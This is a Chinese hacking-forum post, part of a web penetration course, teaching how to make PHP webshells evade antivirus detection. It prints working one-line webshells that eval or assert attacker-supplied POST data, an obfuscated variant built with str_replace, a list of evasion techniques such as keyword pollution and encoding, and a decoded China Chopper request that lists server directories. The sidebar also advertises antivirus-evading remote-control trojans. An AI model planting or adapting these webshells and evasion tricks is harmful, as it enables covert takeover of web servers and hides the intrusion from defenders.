HACK80

我们很年轻,但我们有信念、有梦想!

我们坚信只有今天付出了,才有机会看到明天的太阳!
现在!加入我们,给你一个气氛优秀的技术圈子

作者: 宝宝
查看: 9333|回复: 13

more +随机图赏Gallery

2017年中旬WEB渗透系列课程-19文件包含与目录遍历2017年中旬WEB渗透系列课程-19文件包含与目录遍历
2017年中旬WEB渗透系列课程-18上传绕过方法演示2017年中旬WEB渗透系列课程-18上传绕过方法演示
2017年中旬WEB渗透系列课程-17了解上传检测方式2017年中旬WEB渗透系列课程-17了解上传检测方式
2017年中旬WEB渗透系列课程-27HASH提权2017年中旬WEB渗透系列课程-27HASH提权
HACK80远控 免杀的 账号密码打包 每天都发账号 回帖要。可改密码!HACK80远控 免杀的 账号密码打包 每天都发账号 回帖要。可改密码!
2017年中旬WEB渗透系列课程-16解析漏洞演示2017年中旬WEB渗透系列课程-16解析漏洞演示
2017年中旬WEB渗透系列课程-15XSS绕过集合2017年中旬WEB渗透系列课程-15XSS绕过集合
2017年中旬WEB渗透系列课程-14XSS能干什么2017年中旬WEB渗透系列课程-14XSS能干什么
2017年中旬WEB渗透系列课程-13XSS漏洞检测2017年中旬WEB渗透系列课程-13XSS漏洞检测
2017年中旬WEB渗透系列课程-12XSS分析及演示2017年中旬WEB渗透系列课程-12XSS分析及演示

2017年中旬WEB渗透系列课程-21webshell免杀相关问题

[复制链接]
宝宝 发表于 2017-11-6 04:06:17 | 显示全部楼层 |阅读模式
查看: 9333|回复: 13

马上注册,加入HACK80!与我们一起交流。

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
截图:
21.PNG

21ppt.PNG

播放地址
游客,如果您要查看本帖隐藏内容请回复

文字说明:

二十一:webshell免杀相关问题
我们一直致力于信息安全培训服务!

HTTP://WWW.HACK80.COM


分析一句话是如何工作的
  1. <div>
  2. </div><div><?php @eval ($_POST[‘pass’];)?></div>
复制代码




Eval=assert


分析菜刀是如何工作的

通过抓包中国菜刀webshell管理工具来分析菜刀是如何工作的


免杀shell的过程

关键字污染
替换更改函数
猜分组合
编码加密
函数调用


例子:
  1. <?php $a = str_replace(x,"","axsxsxxexrxxt");$a($_POST[“pass"]); ?>
复制代码

  1. <div>
  2. </div><div><?php assert($POST[‘PASS’]);?></div>
复制代码



尝试免杀


1.表面免杀
2.行为免杀









解密前:

  1. pass=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=RDpcXHdhbXBcXHd3d1xcc2FmZVxc
复制代码





解密后:
  1. <div>pass=@eval(base64_decode($_POST[z0]));&z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."</div><div>";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();z1=D:\\wamp\\www\\safe\\</div>
复制代码







 楼主| 宝宝 发表于 2017-11-6 04:06:50 | 显示全部楼层
以后课程估计由我发的概率大些,老大比较忙
套套不绝 发表于 2017-11-6 15:33:28 | 显示全部楼层
宝哥辛苦!
root 发表于 2017-11-6 23:24:59 | 显示全部楼层
前排支持!nn
johnsmith 发表于 2017-11-10 13:57:28 | 显示全部楼层
thank you thank you
citizenxyc 发表于 2017-11-12 17:55:14 | 显示全部楼层
谢谢分享,学习学习
citizenxyc 发表于 2017-11-12 17:56:50 | 显示全部楼层
视频看不了啊
xx20172017 发表于 2017-11-12 23:44:22 | 显示全部楼层
感谢  分享
心魂圣王 发表于 2017-11-15 18:45:42 | 显示全部楼层
看看,学习学习
309475523 发表于 2017-11-18 15:53:47 | 显示全部楼层
十分感谢,辛苦了。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|小黑屋|手机版|HACK80 ( 沪ICP备15007512号 )

GMT+8, 2017-12-17 12:25 , Processed in 0.071883 second(s), 28 queries .

Powered by Discuz! X3.4 © 2001-2013 Comsenz Inc.